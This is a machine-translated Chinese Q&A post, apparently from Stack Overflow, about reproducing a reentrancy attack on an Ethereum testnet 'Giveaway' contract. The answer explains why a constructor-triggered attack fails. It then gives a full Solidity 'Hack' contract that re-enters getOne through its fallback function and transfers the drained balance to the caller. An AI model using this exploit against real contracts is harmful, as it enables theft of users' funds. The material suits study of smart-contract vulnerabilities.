我正在尝试使用下面的漏洞重新创建重新入侵攻击: https://ropsten.etherscan.io/address/0xe350eef4aab5a55d4efaa2aa6f7d7420057eee2a#code
以下的剥削合同: https://ropsten.etherscan.io/address/0x7e95eed55994d8796c007af68b454fb639e9bd93#code
如果我没记错的话,使用msg.sender.call功能时无需指定气体津贴。无论如何,my exploitation contract上的后退功能根本不会触发,为什么会发生这种情况呢?
答案 0 :(得分:1)
根据对Issue 583 of Solidity的评论,由于EVM的限制,您的代码无法正确执行。
当调用合约的构造函数时,合约的代码尚未存储在其地址中。因此,当它接收以太网时,没有后退功能在其地址触发。这可以通过从test.getOne()合同中的单独函数调用Hack函数来解决。
此外,您的 Hack 合同可以进行细化,如下所示:
pragma solidity ^0.4.23;
contract Giveaway {
function register(address toRegister) public;
function getOne() public;
}
contract Hack {
/**
* It is actually better to store the variables
* in 128-bit segments as the EVM is optimized in
* handling 256-bit storage spaces and will pack
* the two variables below in a single slot.
*/
uint128 times = 3;
uint128 current = 0;
Giveaway test = Giveaway(0xe350EEf4aAb5a55d4efaa2Aa6f7D7420057EEe2A);
// This function will execute correctly as it is not a constructor
function hackGiveaway() public {
test.register(address(this));
test.getOne();
drainThis();
}
// Left as is
function() public payable{
if(current<times){
current++;
test.getOne();
}
}
/**
* Internal functions do not change the context of
* msg.sender compared to public/external functions.
*/
function drainThis() internal {
msg.sender.transfer(address(this).balance);
}
}